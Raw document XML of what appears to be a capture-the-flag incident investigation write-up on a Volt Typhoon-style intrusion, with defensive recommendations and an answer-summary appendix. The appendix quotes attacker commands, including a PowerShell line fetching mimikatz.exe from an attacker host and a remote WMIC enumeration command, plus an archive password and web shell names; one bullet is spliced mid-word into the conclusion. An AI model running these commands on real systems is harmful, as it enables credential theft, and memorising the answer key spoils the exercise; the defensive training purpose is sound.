        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Detect and Prevent Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Monitor for unusual use of tools like WMIC, netsh, and remote file shares</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Segment the network to limit attacker movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Protect Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use credential protection mechanisms (e.g., LSASS protection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regula12. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:hanging="0" w:start="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This investigation highlights a sophisticated attack chain typical of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Volt Typhoon</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, demonstrating stealth, persistence, and effective use of native tools. Continuous monitoring, logging, and proactive defense strategies are essential to detect and mitigate such threats.rly rotate passwords and monitor for credential dumping behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>File Integrity &amp; Threat Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Detect suspicious file renaming (e.g., executables disguised as .gif files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Deploy Endpoint Detection and Response (EDR) solutions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Patch Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Regularly update and patch externally exposed applications such as ADSelfService Plus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="709"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Incident Response Preparedness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Maintain and test incident response plans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:hanging="283" w:start="1418"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ensure rapid containment and forensic readiness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In conclusion, this attack demonstrates how a determined adversary can exploit weak points, remain undetected, and extract valuable data. A layered security approach combining visibility, prevention, and rapid response is essential to defend against such advanced threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:themeColor="accent1" w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="appendix-answer-summary"/>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Appendix: Answer Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Dean password changed time: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2024-03-24T11:10:22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">New admin account: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>voltyp-admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">WMIC drive enumeration command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wmic /node:server01, server02 logicaldisk get caption, filesystem, freespace, size, volumename</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Archive password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>d5ag0nm@5t3r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Web shell directory: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>C:\Windows\Temp\</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">MRU removal cmdlet: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Remove-Item-Property</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Renamed archive: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cl64.gif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Virtualization registry path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Credential-related software: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>OpenSSH, putty, realvnc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Mimikatz download command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Event IDs searched: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>4624 4625 4769</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">New lateral movement web shell: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>AuditReport.jspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Financial files copied: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2022.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2023.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>2024.csv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Proxy connect address and port: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>10.2.30.1 8443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Cleared logs: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1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72"/>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d5ag0nm@5t3r"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188</TotalTime>
  <Application>LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>9</Pages>
  <Words>867</Words>
  <Characters>5640</Characters>
  <CharactersWithSpaces>6394</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en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-30T01:29:50Z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